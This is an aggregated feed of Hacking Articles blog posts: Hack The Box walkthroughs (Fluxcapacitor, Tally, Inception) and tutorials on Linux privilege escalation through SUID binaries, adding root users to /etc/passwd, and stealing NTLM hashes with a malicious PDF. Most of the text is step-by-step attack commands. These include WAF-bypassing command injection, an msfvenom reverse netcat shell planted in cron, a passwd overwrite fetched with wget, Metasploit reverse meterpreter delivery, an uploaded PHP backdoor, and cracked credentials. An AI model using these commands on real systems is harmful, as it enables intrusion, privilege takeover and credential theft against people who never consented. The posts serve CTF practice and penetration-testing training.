Loading...

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Fluxcapacitor of Hack The Box. Solving this lab is not much easy, all you need is your web penetration testing skill to solve this challenge. This lab is designed to bypass Web Application Firewall (WAF) for exploiting OS command injection vulnerability in this machine.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Fluxcapacitor has IP: 10.10.10.69.

As we knew the initial stage is enumeration; therefore use nmap version scan for gathering target’s machine and running services information.

nmap -sV 10.10.10.69

So from its scanning result, it told us that port 80 is open for web services and also protected by web application firewall “superWAF”  thus we explored target IP in the web browser but found nothing interesting.

Then we look into its source code and saw an exciting comment which was pointing towards URL: /sync, and without wasting time we open /sync in URL.

LOL!!! It gave 403 forbidden error message and something openresty/1.13.6.1 then we looked into Google for any exploit related to this but failed to find any working exploit against it.

At the moment, we decided to use burp suite for intercepting our browser request. So after intercepting the Http request, the raw information is sent to the repeater.

Huhhhh!! It was responding same output as was in the web browser. Might be there would be some chances of WAF filter restriction on User-Agent such as Mozilla Firefox/5.0.

So we start scrutiny for User-Agent field by replacing original user-agent content from “raj” randomly. Finally!!! It gave current timestamp as disclosed in the comment found in the source code of the home page.

Now it was confirmed that there was SuperWAF filter against the user-agent field, therefore, we try to search its exploit in Google but we didn’t find any particular exploit.  Nevertheless, Google gave a little hint for OS command injection and on the bases of that, we try few parameters within Http Header such as /sync?test=ls which response with the same timestamp every time. Hence we need to fuzz proper directory, therefore, we will use wfuzz in our next step.

So we use common.txt wordlist for URL brute force and execute below command.

wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19

It gave 403 response for payload “opt”; let’s try to opt after/sync and identify the response.

Now use ‘opt’ parameter to bypass WAF and execute ls command through it, HOWEVER again there is a trick to execute ls command. Because WAF will not allow you to perform OS command injection directly, therefore, it will be a little bit tougher to exploit it. But THANKS to medium.com, because I got the idea to bypass WAF for exploiting OS command injection which is known as string literal concatenation from this website, means that adjacent string literals are concatenated, without any operator.

We took help from that website which I have mentioned above and execute three commands: whoami, id, uname through curl as shown in image.

curl "http://10.10.10.69/sync?opt=' whoami' "
curl "http://10.10.10.69/sync?opt=' id'"
curl "http://10.10.10.69/sync?opt=' u'n'ame -a' "

 Superb!! It was great to know that we have bypassed WAF successfully, but still the task is not completed yet.

Let’s seize the user.txt and root.txt file and finished this task. Hhhhhh!!!! Believe me, still, it is not easy to bypass WAF even if your goal is near. Seriously we put great efforts and at last found user.txt when executed below commands.

curl "http://10.10.10.69/sync?opt=' l's' /home'"
curl "http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'"
curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"

Now the goal was root.txt file and taking a lesson from the previous experience I choose to run sudo -l command to check the sudo privileges of the current user.

curl "http://10.10.10.69/sync?opt=' sudo -l'"

 

Awesome!! It told us that we can run a script “monit” with root privileges without using password, which is inside /home/themiddle/ directory. Let’s open it with the help of cat command.

curl "http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''"

After reading .monit file, we concluded that the script takes two parameter i.e. cmd string and base64 decoding which will match the conditions according to it and passes the final result to bash -c as parameter.

 

Hence it was clear that 1st parameter will match string “cmd” and 2nd will decode base64 value for that reason first we generated base64 value for /root/root.txt because we were well aware of the location of the root.txt file from our previous challenges.

echo "cat /root/root.txt" | base64

Now with the help of sudo privilege execute the command to gain root access and complete the task by grabbing root.txt

curl "http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='"

HURRAYYYY!!! We hit the goal and successfully found the root.txt file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge: Fluxcapacitor Walkthrough appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

In our previous article we have discussed “Privilege Escalation in Linux using etc/passwd file” and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving CTF challenges we always check suid permissions for any file or command for privilege escalation. It is very important to know what SUID is, how to set SUID and how SUID helps in privilege escalation. You can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link 1:  Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s Start with Theoretical Concept !!

As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of Linux users to whom you are going allow or restrict all three permissions. Take a look at the following image.

Hence it is clear that the maximum number of bit is used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set chmod 755, then it will look like as rwxr-xr-x.

But when special permission is given to each user it becomes SUID, SGID and sticky bits. When extra bit “4” is set to user(Owner) it becomes SUID (Set user ID) and when bit “2” is set to group it becomes SGID (Set Group ID) and  if other users are allowed to create or delete any file inside a directory then sticky bits “1” is set to that directory.

What is SUID Permission?

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.  Assume we are accessing target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges. 

How to set suid?

Basically, you can change the permission of any file either using “Numerical” method or “Symbolic” method. As result, it will replace x from s as shown in below image which denotes especial execution permission with the higher privilege to a particular file/command. Since we are enabling SUID for Owner (user) therefore bit 4 or symbol s will be added before read/write/execution operation.

If you execute ls -al command with the file name and then you will observe symbol small ‘s’ as in above image then its means SUID bit is enabled for that file and it can be run with root privileges.

HOW SUID helps in privilege escalation?

In Linux, some of the existing binaries and commands can be used by non-root user to escalate privileges to root access if the SUID bit is enabled. There are some famous Linux/Unix executables commands that can let privilege escalation are: Bash, Cat, cp, echo, find, Less, More, Nano, Nmap, Vim.

Let’s get into deep through practical work. First, create a user which should be not the sudo group user. Here we have added user “ignite” whose UID is 1001 and GID is 1001 and hence ignite is non-root user.

Privilege Escalation using Copy Command

If suid bit is enabled for cp command which is used to copy the data, then it can lead to privilege escalation to gain root access. For example, suppose you (system admin) want to give SUID permission for cp command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which cp
ls -al /bin/cp
chmod u+s /bin/cp

1st Method

On other hands start yours attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

In above image, you can observe that it is showing so many files but we are interested in /bin/cp file. Because now we can copy /etc/password file for reading user list. Therefore I copy /passwd file inside HTML directory.

cp /etc/passwd /var/www/html

On other hands we have generated a new encrypted password: pass123 using OpenSSL passwd

We have copied /passwd file inside the web directory i.e. /var/www/html, therefore I can open it through the web browser then copied the entire content of /password file in a text file and after then we can add our own user with root UID, GID and directory.

In our previous article, we have already discussed how to add a user /etc/passwd using openssl passwd utility.

Run Python HTTP server for transferring our edited passwd file into target’s machine.

python -m SimpleHTTPServer 80

As we all know /tmp directory has all permission to create or delete any file, therefore, we have download our passwd file inside it.  Once it gets downloaded after then we copied the data of /tmp/passwd into /etc/passwd as result it will overwrite original passwd file.

cd /tmp
wget http://192.168.1.108/passwd
cp passwd /etc/passwd

With the help of tail command, we ensured that our user “hack” is either the part of /etc/passwd file. Since we have added our own user with root privileges let’s get into the root directory.

su hack
whoami

And Yessssssss !! This is an incredible way to escalated root privilege.

2nd Method

Similarly, we can also transfer our backdoor in target’s system if SUID bit is enabled for cp command. Here we have generated natcat backdoor for reverse connect using msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the above-highlighted code and paste in a text file by editing #!/bin/bash then ready to transfer it into target’s system, I have saved it as raj.sh.

Now we all are aware of Linux crontab utility that runs file hourly, daily, weekly and monthly and thus I copied raj.sh inside /etc/cron.hourly. Hence it will run raj.sh file after one hour.

cp raj.sh /etc/cron.hourly/
ls -al /etc/cron.hourly/

Other hands we started Netcat listener in a new terminal and as the hour past it gives reverse connect of target’s system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if SUID bit is ON. You can try your own way to escalated root privilege using cp command.

Privilege Escalation Using Find Command

Similarly, we can escalate root privilege if SUID bit is ON for find command. For example, suppose you (system admin) want to give SUID permission for Find command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which find
ls -al /usr/bin/find
chmod u+s /usr/bin/find

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for find command which means we can execute any command within find command. To do so first we create an empty file “raj” and then run whoami command as shown below.

touch raj
find raj -exec "whoami" \;

If an attacker successfully enumerated SUID bit for /usr/bin/find then it will allow him to execute any malicious command such netcat bin/bash shell or may fetch important system information for privilege escalation.

Privilege Escalation Using Vim

Similarly, we can escalate root privilege if SUID bit is ON for Vim editor. For example, suppose you (system admin) want to give SUID permission for Vim editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim
ls -al /usr/bin/vim
ls -al /usr/bin/alternatives/vim
chmod u+s /usr/bin/vim.basic

You will found vim.basic through symlinking as shown in the below image.

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries who’s having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /usr/bin/vim.basic and hence now we can edit any file which through vim that can be editable only by sudo or root user.

As we know ignite is non-root user who has least permissions, since vim has SUID permission, therefore, we can edit the sudoers file through it and can change permissions for user “ignite”. So we open sudoers file by typing visudo command and give all permission to user “ignite” as shown in the image.

ignite   ALL=(ALL:ALL) ALL

Now let access root directory as shown in below image.

sudo -l
sudo bash
id

 Great!! This trick also work superbly for privilege escalations.

Privilege Escalation using Saved Script

There are maximum chances to get any kind of script for the system or program call, it can be any script either PHP, Python or C language script. Suppose you (system admin) want to give SUID permission to a C language script which will provide bash shell on execution.

So here we have coded a c program which will call system for bash shell and saved it as “asroot.c”.

Then create a rootshell directory inside /bin directory and copied the asroot.c file in rootshell directory then run gcc compiler for compilation.

mkdir /bin/rootshell
cd /bin/rootshell
cp /home/raj/Desktop/asroot.c .
ls
gcc asroot.c -o shell
chmod u+s shell
ls -al shell

Now again compromise target’s system and use find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files but we are interested in /bin/rootshell/shell. So we move into /bin/rootshell directory and run the script “shell” as result we get root access as shown below.

cd /bin/rootshell
./shell
id

Thus we saw how we can escalate root privilege if SUID bit is enabled for any script, although it is not possible to get such script which calls bash shell but if you found any script with SUID permission then using above techniques you can modify the content of that script to get the bash shell.

Privilege Escalation Using Nano

Similarly, we can escalate root privilege if SUID bit is ON for nano editor. For example, suppose you (system admin) want to give SUID permission for nano editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim
ls -al /bin/nano
chmod u+s /bin/nano

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /bin/nano and now let’s open /etc/passwd file to edit own user as done above by using openssl passwd.

On other hands I have generated a new encrypted password: 123 using openssl passwd

Now open passwd file with nano editor and add your own user as done above. Here you can observe I have created demo user with encrypted password in victim’s system.

nano /etc/password

Since we have added our own user with root privileges let’s get into root directory.

su demo
id

2nd Method

If suid bit is enabled for /bin/nano then we can steal the password from inside /etc/shadow file. So after compromising target’s machine we had opened shadow file in nano editor and copy the encrypted password set for user: raj.

Now paste above copy code into a text file and saved as hash on the desktop, after then used john the ripper to decode it as shown below. It has given raj: 123 as password, now try to login into target’s system through raj account.

So Today we have demonstrated how the SUID permission can lead to privilege escalation even if it is allow to a normal copy, cat, nano, vim and so commands and programs.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Linux Privilege Escalation using SUID Binaries appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Today we are demonstrating stealing NTLM hashes through a pdf file. We have already discussed the various method to Capture NTLM Hashes in a Network in our previous article. Recently a new tool has launched “Bad-PDF” and in this article, we are sharing our experience.

Bad-PDF create malicious PDF to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines, it utilizes vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.

This method work for all PDF readers(Any version) and java scripts are not required for this attack, most of the EDR/Endpoint solution fail to detect this attack.

git clone https://github.com/deepzec/Bad-Pdf.git
cd Bad.Pdf
ls
chmod 777 badpadf.py

Now run the python file with the help of following command given below:

python badpdf.py

Then it will try to connect with Responder through its default path i.e. /user/bin /responder but in our case, the location of the responder is user/sbin/responder. After then it will ask your network IP, the name of the output file and interface name, submit this information as per your network.

Then it will create a malicious pdf file with name bad.pdf, now transfer this pdf file to your target.

So, when the victim will click our malicious file, his NTLM hash will be captured as shown in below image. Here you can observe username ‘raj’ along with its hash password. Now copy the hash value in a text document so that you can crack this hash value for retrieving the password.

We have paste the hash value in a text file and save it as “hash” on the desktop. Later we had used John the ripper for cracking the hash.

john hash

Awesome!!! We have retrieved password: 133 for user: raj.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Capture NTLM Hashes using PDF (Bad-Pdf) appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

In this article, we will learn “Various methods to alter etc/passwd file to create or modify a user for root privileges”. Sometimes, it is necessary to know ‘how to edit your own user for privilege escalation in machine’ inside /etc/passwd file, once target is compromised.You can read our previous article where we had applied this trick for privilege escalation. Open the  links given below:

Link 1: Hack the Box Challenge: Apocalyst Walkthrough

Link 2: Hack the Hackday Albania VM (CTF Challenge)

Firstly, we should be aware of /etc/passwd file in depth before reaching to the point. Inside etc directory, we will get three most important files i.e. passwd, group and shadow.

etc/passwd: It is a human-readable text file which stores information of user account.

etc/group: It is also a human-readable text file which stores group information as well as user belongs to which group can be identified through this file.

etc/shadow: It is a file that contains encrypted password and information of account expire for any user.

The format of details in /passwd File

Get into its Details Description

Username: First filed indicates the name of the user which is used to login.

Encrypted password: The X denotes encrypted password which is actually stored inside /shadow file. If the user does not have a password, then the password field will have an *(asterisk).

User Id (UID): Every user must be allotted a user ID (UID). UID (zero) is kept for root user and UIDs 1-99 are kept for further predefined accounts, UID 100-999 are kept by the system for administrative purpose. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given the UID of 1001.

Group Id (GID): It denotes the group of each user; like as UIDs, the first 100 GIDs are usually kept for system use. The GID of 0 relates to the root group and the GID of 1000 usually signifies the users. New groups are generally allotted GIDs begins from 1000.

Gecos Field: Usually, this is a set of comma-separated values that tells more details related to the users. The format for the GECOS field denotes the following information:

User’s full name

Building and room number or contact person

Office telephone number

Home telephone number

Any other contact information

Home Directory: Denotes the path of user’s home directory, where all his files and programs are stored. If there is no specify directory then / becomes user’s directory.

Shell: It denotes the full path of the default shell that executes commands (by user) and displays the results.

 NOTE: Each field is separated by : (colon)

Let’s Start Now!!

Adding User by Default Method

Let’s first open /etc/passwd file through cat command, to view the present users available in our system.

From image given above, you can perceive that “raj” is the last user with uid 1000. Here gid 1000 denotes it is a non-system user. 

Let see what happens actually in /passwd file, when we add any user with adduser command. So here you can clearly match the following information from below given image.

adduser user1

Username: user1

GID: 1002

UID: 1001

Enter password: (Hidden)

Home Directory: /home/user1

Gecos Filed: Full Name, Room Number, Work phone, Home Phone, Other (are blanked)

When you will open /passwd file then you will notice that all above information has been stored inside /etc/passwd file.

Manually Editing User inside /etc/passwd File

Generally, a normal user has read-only permission for passwd file but sometimes it is also possible that a user has read/write permission, in that scenario we can add our own user inside /etc/passwd file with help of above theory.

user2:*:1002:1003:,,,:/home/user2:/bin/bash

The *(asterisk) sign denotes empty password for user2.

Since we have allotted 1003 GID for user2, therefore, we need to address it in /etc/group file too.

Follow the format given below:

Syntax: Username:X:GID

Since we don’t have password, therefore, use * sign at the place of X.

user2:*:1003

Now, set a password for user2 with passwd command and enter the password.

passwd user2

Since we have created new user ‘user2’ manually without using adduser command, therefore, we will not find any new entry in /etc/shadow file. But it’s there in /etc/passwd file, here the * sign has been replaced by encrypted password value. In this way, we can create our own user for privilege escalation.

Openssl

Sometimes it is not possible to execute passwd command to set the password of a user; in that case, we can use openssl command which will generate an encrypted password with salt.

OpenSSL passwd will compute the hash of the given password using salt string and the MD5-based BSD password algorithm 1.

Syntax: openssl passwd -1 -salt [salt value] {password}

 openssl passwd -1 -salt user3 pass123

We will get the encrypted password, after that, open /passwd file by typing vipw command in terminal and add username manually. Follow the manual step of adding new user “user3” and paste encrypted value at the place of * or X for a password.

In below image you can observe that, I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user3.

Now switch user and access the terminal through user3 and confirm the root access.

su user3
whoami
id

YESSSSSS it is working successfully.

Note: You can also modify other user’s password by replacing: X: from your own encrypted passwd and login with that user account using your password

mkpasswd

mkpasswd is similar as openssl passwd which will generate a hash of given password string.

Syntax: mkpasswd -m [hash type] {password}

mkpasswd -m SHA-512 pass

It will generate a hash for your password string, repeat above step or change the password of other existed users.

If you will compare entry of user1 then you can notice the difference. We have replaced: X: from our hash value.

Now switch user and access the terminal through user1 and confirm the root access.

su user1
whoami
id

Great!! It is also working.

Python

Using python we can import crypt library and add salt to our password which will create encrypted password including that salt value.

python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'

It will generate a hash value of your password string, repeat above step or change the password of other existed users. If you will compare entry of user2 then you can notice the difference. We have replaced old hash value from our new hash value.

Now switch user and access the terminal through user2 and confirm the root access.

su user2
whoami
id
pwd
sudo -l

 It is also working, previously it was a member of /home/user2 directory but after becoming a member of /root directory you can notice it has owned all privilege of the root user.

Perl

Similarly, we can use Perl along with crypt to generate a hash value for our password using salt value.

perl -le 'print crypt("pass123", "abc")'

You will get the encrypted password, after that, again open /passwd file by typing vipw command in terminal and add username manually. Follow the manual step of adding new user “user4” and paste encrypted value at the place of * or X for a password.

In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user4.

Now switch user and access the terminal through user4 and confirm the root access.

su user4
whoami
id

Great!! This method is also working.

PHP

Similarly we can use PHP along with crypt to generate hash for our password using salt value.

php -r "print(crypt('aarti','123') . \"\n\");"

You will get the encrypted password, after that, open /passwd file by typing vipw command in terminal and add username manually. Follow the manual step of adding new user “user5” and paste encrypted value in field of password.

In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user5.

Now switch user and access the terminal through user5 and confirm the root access.

su user5
whoami
id

Hence there are so many ways to add your own users with root access which is quite helpful to get root privilege in any machine.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Privilege Escalation in Linux using etc/passwd file appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello Friends!! Today we are going to solve a CTF Challenge “Tally”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Tally Lab has IP: 10.10.10.59.

Now, as always let’s begin our hacking with the port enumeration.

nmap -p- -A 10.10.10.59

When you will explore target IP through the browser, it will be redirected to a SharePoint page as shown below which also declared by nmap in above image.

Then we have used several directory brute-forcer tools in order to enumerate some useful URL for web directory but failed to retrieve. Then I penetrate for the web directory manually with the help of Google search and slowly and gradually reached at /sitepages/FinanceTeam.aspx and found ftp username as shown below in the image.

Moreover, I found a link for SharePoint directory brute-force attack that helps me in my next step.

We found this URL http://10.10.10.59/shared documents/forms/allitems.aspx from inside above-given link, and when you will open above path in your browser as shown below, you will see a file named “ftp-details”. Download this doc file and open it.

You will get a password from inside ftp details doc file.

Now login into FTP using following credentials and download tim.kdbx in your local machine.

Username: ftp_user
Password: UTDRSCH53c"$6hys

Since the file contains .kdbx extension and I don’t know much about it, therefore, I jumped for Google search from there I got this link to download a python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.

python keepass2john.py tim.kdbx > tim

Next, we have used John the ripper for decrypting the content of “tim” with help of the following command.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim

When you will obtain the password for “keepass2” which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command:

apt-get install keepass2 -y

After installing, run the below command and submit “simplementeyo” in the field of the master key.

keepass2 tim.kdbx

Then you can find username and password from inside /Work/Windows/Shares for sharing a file through SMB login, since port 135-445 are open in targets machine for sharing files.

Here the password is hidden inside * character; copy and paste it into a text file and you will get the password into plain letters I.e. Acc0unting .

Now you are having SMB login credential “Finance: Acc0unting”, then execute following command for connecting with targets network and It will show “ACCT” as sharename.

smbclient -L 10.10.10.59 -U Finance

Further type below commands and at last when you found conn-info.txt, download it.

smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt

When you will download conn-info.txt file, open it, it will tell you MSSQL database login credential.

db: sa
pass: YE%TJC%&HYbe5Nw

 From below image you can observe that, it was old server details and might be the password for sa has been changed now.

Again login into SMB and look for next hint by moving into /zz_Migration, for that you need to execute below commands:

smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"

Here you will found tester.exe, download it.

get tester.exe

You will get tester.exe inside your /root directory since the file is too large, it is impossible to find desirable information from that. Therefore use grep along with strings command.

strings tester.exe | grep DATABASE

And you will get a new password for user sa as shown in below image.

For next step I took help from our previous article which was on MSSQL penetration testing. Open a new terminal and load metasploit framework and execute below commands.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for .dll and Paste it inside as CMD command as shown in next image.

Now open new terminal and again load a new metasploit framework and execute below commands.

use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit

You will get meterpreter session of victim’s machine in your 1st metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:

getuid

So currently we don’t have NT AUTHORITY\SYSTEM permission.

But we have successfully grabbed user.txt file from inside /Sarah/Desktop.

cd Sarah/Desktop
ls
cat user.txt

In this way we have completed our first task. Now let’s find root.txt!!

load incognito

Incognito option in meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system

list_token -u

If we talk related to impersonate token then you can see currently there is no token available.

Then I took help from Google in such scenario and found a link for downloading Rottenpotato from github for privilege escalation.

git clone https://github.com/foxglovesec/RottenPotato.git

After downloading it will give rottenpotato.exe file.

Upload the exe file into victim’s machine.

upload /root/Desktop/RottenPotato/rottenpotato.exe .

Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.

execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

After then when you will run getuid command again, it will tell you that you have escalated NT AUTHORITY\\SYSTEM

Then come back to /Users directory and perceive available directories inside it. You will get root.txt form inside C:\Users\Administrator\Desktop go and grab it, and finished the task.

cd Administrator
cd Desktop
ls
cat root.txt

Fabulous!! The task has been completed and hacked this box.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge: Tally Walkthrough appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friends!! Today we are going to solve another challenge “Inception” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy, you have to use your entire Penetration testing skills. Let start and learn how to breach a network and then exploit it for retrieving desired information.

Level: Hard

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Inception is 10.10.10.67 so let’s start with nmap port enumeration.

nmap -A 10.10.10.67

From given below image, you can observe we found port 80 and 3128 are open in victim’s network.

Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image get opened as shown below.

Then we check its source code and found something “dompdf” which could be a directory, so let’s go through it.

So when we had explored /dompdf in the browser, it put up some files. I was interested in version so we opened it and found version 0.6.0

After that with help of searchsploit, we got an exploit 33004.txt for dompdf 0.6.0.

In this exploit, you will get an instance for exploiting the target machine with help of LFI.

Then without wasting time we look for /etc/passwd file with help of the following command:

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd

But we got an encoded result, therefore, we need to decode it.

From given below image you can observe that we have successfully decoded base 64 data and can read first username Cobb

And after penetrating very deep, we found default.conf file inside apache which holds another base64 value, now uses given below command for that.

http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf

After decoding above found base64 value, you will get a highlighted path for authuserfile as shown below in the given image. If you will read the text inside location tag <location>, you will realize that it is giving hint for login credential for /webdev_test_inception and more security details such as authentication type: basic.

Again type the following command:

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd

Hmmmmm!!! One more base64 value, let’s decode this also.

So when we had decoded above based 64 value and found a hash value for user “webdav_tester” from it. Here we had copied it into a text file and now going to use john the ripper for cracking this hash.

Type following command for cracking hash value with the help of /rockyou.txt

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Great!! It gives “babygurl69”

So currently we have our username “webdav_tester” and the password “babygurl69” for login into / webdev_test_inception and authentication type is also basic therefore we can use cadaver for uploading backdoor.

Type following command for uploading php backdoor:

cadaver http://10.10.10.67/webdav_test_inception
webdav_tester
babygurl69 
put /root/Desktop/qsd-php-backdoor.php

While uploading php backdoor we had tried so many types of php backdoor but among them qsp-php-backdoor.php was working and it is default location is /usr/share/webshells/php.

Then we open uploaded php shell in the browser and click on “go to current working directory”.

http://webdav_test_inception/qsd-php-backdoor.php

It brings us into inside /html directory, where we saw wordpress 4.8.3 and opened it.

Then we explore /wp-config.php file and found username “root” and password “VwPddNh7xMZyDQoByQL4″. We also tried to login to wordpress but it was not active.

Again we came back to the previous page as shown below and type the following command inside execute shell text filed for identifying all running services inside the network.

netstat -antp

Here we found ssh is open inside internal network and also observed new interface 192.168.0.10

Since we know port 3128 is open for squid http proxy, so now open /etc/proxy.conf to add that inside it as shown below in the image.

Now connect to ssh through proxychains by using below command and submit password that was found from inside /wp-config.php for user cobb.

proxychains ssh cobb@127.0.0.1

Nice!!! It works and we logged in successfully, let’s grab the user.txt first as shown.

Then for finding root.txt flag, we need privilege escalation, therefore, type sudo -l command which will tell you sets permission for user cobb. And you will see that Cobb has ALL permissions. Then further we execute sudo su and got root access and move for root.txt file.

Dammitttttttt!!!!! It was a bloody trap, not original root access.

ifconfig tells us IP is 192.168.0.10 and then we ping thought to ping 192.168.0.1, and the host was up.

Then with help of the following command, we came to know port 21, 22 and 53 was opened.

nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded

We successfully login into ftp by using anonymous: anonymous and run ls command for looking all directories and files.

Inside /etc we saw three files: passwd, crontab and tftpd-hpa in /default. We downloaded all three files.

cd /etc
put passwd
put crontab
cd default
put tftpd-hpa

Then read all three file through cat

cat /etc/passwd
cat /default/tftpd-hpa

cat crontab

Here we saw something very interested that every 5 minutes apt-update command is running.

Then we generated ssh key by executing following command:

ssh-keygen

Now enter following commands for uploading public key on 192.168.0.1 using TFTP:

cd /root/.ssh
tftp 192.168.0.1
put id_rsa.pub /root/.ssh/authorized_keys

Since tftp gives all permission to the authorized key which means anyone can read and write it as result ssh public key get fail due to incorrect permission, it should 600. Now exit from tftp and change authorized key permission in the current host machine.

quit

 We were not much sure how to change permission through apt-update command, therefore, we search in Google and luckily found a link that helps us in generating apt update command for changing authorized key permission.

echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshell
tftp 192.168.0.1
put rootshell /etc/apt/apt.conf.d/rootshell
quit
ssh root@192.168.0.1

 Wait for 5 mins and then you will get root access. After that grab the root.txt flag and Hit the GOAL!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge: Inception Walkthrough appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello Friends!! Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Bashed is a Retired Lab.

Level: Medium

